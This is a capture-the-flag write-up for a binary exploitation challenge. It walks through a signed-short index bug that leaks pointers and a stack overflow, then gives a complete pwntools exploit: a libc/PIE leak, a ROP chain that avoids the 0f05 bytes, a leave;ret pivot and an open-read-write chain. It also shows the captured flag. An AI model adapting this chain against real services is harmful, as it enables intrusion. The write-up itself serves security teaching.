ApoorvCTF 2026 - Cosmic Rings - Binary Exploitation Writeup

Category: Binary Exploitation Flag: apoorvctf{c0sm1c_b4rr13rs_br0k3n_4nd_h4v0k_s3cur3d}

Challenge Description#

Havok has calibrated four concentric plasma rings to contain the cosmic spectrum. Each ring is a barrier. Each barrier can be broken but can you break them?

Analysis#

The binary is a 64-bit PIE ELF with all the usual modern protections turned on (Full RELRO, canary, NX, PIE), so the solve path had to be leak-first and then controlled ROP instead of any simple ret2win shortcut.

1
file ./havok

1
./havok: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=dbfdb67cc5c037eabc542700fb98ed98dcb8656e, for GNU/Linux 4.4.0, with debug_info, not stripped

1
checksec --file=./havok

1
[*] '/home/LIGHT/Downloads/cosmic_rings/havok'
2
    Arch:       amd64-64-little
3
    RELRO:      Full RELRO
4
    Stack:      Canary found
5
    NX:         NX enabled
6
    PIE:        PIE enabled
7
    Stripped:   No
8
    Debuginfo:  Yes

I then pulled the symbol table to confirm the interesting functions and imports: calibrate_rings, inject_plasma, validate_plasma, and imported read/system.

1
readelf -s ./havok | rg "calibrate_rings|inject_plasma|validate_plasma|cosmic_release|main|flag_store| read@GLIBC| system@GLIBC"

1
9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND read@GLIBC_2.2.5 (3)
2
    13: 0000000000001226   177 FUNC    LOCAL  DEFAULT   13 validate_plasma
3
    31: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND system@GLIBC_2.2.5
4
    33: 00000000000011e9    61 FUNC    GLOBAL DEFAULT   13 cosmic_release
5
    38: 00000000000015d5   132 FUNC    GLOBAL DEFAULT   13 inject_plasma
6
    47: 00000000000012d7   603 FUNC    GLOBAL DEFAULT   13 calibrate_rings
7
    49: 00000000000017e0   300 FUNC    GLOBAL DEFAULT   13 main
8
    55: 0000000000004280   128 OBJECT  GLOBAL DEFAULT   25 flag_store

The key bug is in calibrate_rings: it reads an int, then truncates to short, checks short <= 3, and uses that signed short as an index. Large positive values like 65534 and 65535 wrap to -2 and -1, which leaks out-of-bounds stack entries containing pointers.

1
objdump -d ./havok | rg -n -A4 -B4 "mov\s+%ax,-0xea\(%rbp\)|cmpw\s+\$0x3,-0xea\(%rbp\)|movswl\s+-0xea\(%rbp\),%eax|lea\s+-0x20\(%rbp\),%rax|mov\s+\$0x30,%edx|call\s+1090 <read@plt>"

1
286-    13f4:    8b 85 1c ff ff ff        mov    -0xe4(%rbp),%eax
2
287:    13fa:    66 89 85 16 ff ff ff     mov    %ax,-0xea(%rbp)
3
288-    1401:    66 83 bd 16 ff ff ff     cmpw   $0x3,-0xea(%rbp)
4
291:    140b:    0f bf 85 16 ff ff ff     movswl -0xea(%rbp),%eax
5
...
6
426:    1632:    48 8d 45 e0              lea    -0x20(%rbp),%rax
7
427-    1636:    ba 30 00 00 00           mov    $0x30,%edx
8
430:    1643:    e8 48 fa ff ff           call   1090 <read@plt>

That same snippet also exposes ring 3’s overflow sink: read(0, rbp-0x20, 0x30), i.e. 48 bytes into a 32-byte stack buffer, enough to overwrite saved RBP and RIP and pivot into a ROP chain.

Running a tiny local probe script confirms those wrapped indices leak two pointers reliably.

1
from pwn import *
2

3
io = process(
4
    [
5
        "./ld-linux-x86-64.so.2",
6
        "--library-path",
7
        ".",
8
        "./havok",
9
    ]
10
)
11

12
io.recvuntil(b": ")
13
io.sendline(b"65534")
14
print(
15
    io.recvregex(rb"\[\*\] Ring-[-0-9]+ energy: 0x[0-9a-fA-F]{16}\n").decode().rstrip()
16
)
17

18
io.recvuntil(b":")
19
io.sendline(b"A")
20

21
io.recvuntil(b": ")
22
io.sendline(b"65535")
23
print(
24
    io.recvregex(rb"\[\*\] Ring-[-0-9]+ energy: 0x[0-9a-fA-F]{16}\n").decode().rstrip()
25
)
26

27
io.close()

1
python ./leak_demo.py

1
[*] Ring--2 energy: 0x00007f55dc91ce00
2
[*] Ring--1 energy: 0x00007f55dcadb7e0

The challenge got annoying because ring 3 input validation rejects any payload containing 0f 05, so the ROP blob had to avoid that byte pair while still building a full chain. Also the network read for the overflow stage is slightly fickle, so retries matter.

tableflip

The working exploit leaks libc and PIE via the wrapped indices, uploads a ROP chain into plasma_sig, then overflows inject_plasma to pivot with leave; ret. Because seccomp blocks execve, shell pop wasn’t the right endgame; the final chain does ORW on flag.txt and writes it to stdout. Once that chain landed, the service printed the real remote flag.

smile

Solution#

1
from pwn import *
2
import re
3

4
HOST = "chals1.apoorvctf.xyz"
5
PORT = 5001
6

7
elf = ELF("./havok", checksec=False)
8
libc = ELF("./libc.so.6", checksec=False)
9

10
LEAVE_RET_OFF = 0x1224
11
POP_RDI_OFF = 0x10269A
12
POP_RSI_OFF = 0x53887
13
POP_RDX_XOR_EAX_RET_OFF = 0xD6FFD
14

15
def start(mode: str):
16
    if mode == "LOCAL":
17
        return process([
18
            "./ld-linux-x86-64.so.2",
19
            "--library-path",
20
            ".",
21
            "./havok",
22
        ])
23
    return remote(HOST, PORT)
24

25
def leak_slot(io, idx: int, label: bytes) -> int:
26
    io.recvuntil(b"Probe a ring-energy slot")
27
    io.recvuntil(b": ")
28
    io.sendline(str(idx).encode())
29

30
    line = io.recvregex(rb"\[\*\] Ring-[-0-9]+ energy: 0x[0-9a-fA-F]{16}\n")
31
    m = re.search(rb"0x([0-9a-fA-F]{16})", line)
32
    leak = int(m.group(1), 16)
33

34
    io.recvuntil(b"Provide a label for this ring reading:")
35
    io.sendline(label)
36
    return leak
37

38
def build_signature(pie_base: int, libc_base: int, path: bytes) -> tuple[bytes, int]:
39
    plasma_sig = pie_base + elf.symbols["plasma_sig"]
40

41
    pop_rdi = libc_base + POP_RDI_OFF
42
    pop_rsi = libc_base + POP_RSI_OFF
43
    pop_rdx = libc_base + POP_RDX_XOR_EAX_RET_OFF
44
    open_ = libc_base + libc.symbols["open"]
45
    close_ = libc_base + libc.symbols["close"]
46
    read_ = libc_base + libc.symbols["read"]
47
    write_ = libc_base + libc.symbols["write"]
48

49
    path_addr = plasma_sig + 0xC0
50
    buf_addr = plasma_sig + 0x180
51

52
    chain = flat(
53
        pop_rdi, 3, close_,
54
        pop_rdi, path_addr,
55
        pop_rsi, 0,
56
        open_,
57
        pop_rdi, 3,
58
        pop_rsi, buf_addr,
59
        pop_rdx, 0x80,
60
        read_,
61
        pop_rdi, 1,
62
        pop_rsi, buf_addr,
63
        pop_rdx, 0x80,
64
        write_,
65
    )
66

67
    sig = flat(0x0, chain)
68
    sig = sig.ljust(0xC0, b"A") + path
69

70
    if b"\x0f\x05" in sig:
71
        raise RuntimeError("signature contains forbidden 0f05 sequence")
72
    return sig, plasma_sig
73

74
def attempt(path: bytes):
75
    io = start("REMOTE")
76
    try:
77
        puts_leak = leak_slot(io, 65534, b"A")
78
        main_leak = leak_slot(io, 65535, b"B")
79

80
        libc_base = puts_leak - libc.symbols["puts"]
81
        pie_base = main_leak - elf.symbols["main"]
82

83
        sig, pivot_base = build_signature(pie_base, libc_base, path)
84

85
        io.recvuntil(b"Upload Plasma Signature")
86
        io.recvuntil(b":")
87
        io.send(sig)
88

89
        io.recvuntil(b"Type CONFIRM")
90

91
        leave_ret = pie_base + LEAVE_RET_OFF
92
        pivot = b"C" * 0x20 + p64(pivot_base) + p64(leave_ret)
93
        io.send(pivot + b"D" * 0x200 + b"\n")
94

95
        out = io.recvrepeat(4.0)
96
        m = re.search(rb"[A-Za-z0-9_]+\{[^}]+\}", out)
97
        if m:
98
            return m.group(0).decode()
99
        return None
100
    finally:
101
        io.close()
102

103
for _ in range(12):
104
    flag = attempt(b"flag.txt\x00")
105
    if flag:
106
        print(flag)
107
        break

1
python ./exploit.py

1
[*] selected mode=REMOTE, marker_only=False
2
[*] trying path b'flag.txt\x00' attempt=1/12
3
[*] start() mode='REMOTE'
4
[*] connecting to remote service
5
[+] Opening connection to chals1.apoorvctf.xyz on port 5001: Done
6
[*] stage: leak slot -2
7
[*] stage: leak slot -1
8
[*] puts leak = 0x7f758beade00
9
[*] main leak = 0x7f758c0417e0
10
[*] libc base = 0x7f758be2b000
11
[*] pie  base = 0x7f758c040000
12
[*] stage: upload signature
13
[*] stage: wait confirm prompt
14
[*] stage: send pivot overwrite
15
[*] stage: receive output
16
[*] Injection acknowledged.
17
apoorvctf{c0sm1c_b4rr13rs_br0k3n_4nd_h4v0k_s3cur3d}
18
FLAG: apoorvctf{c0sm1c_b4rr13rs_br0k3n_4nd_h4v0k_s3cur3d}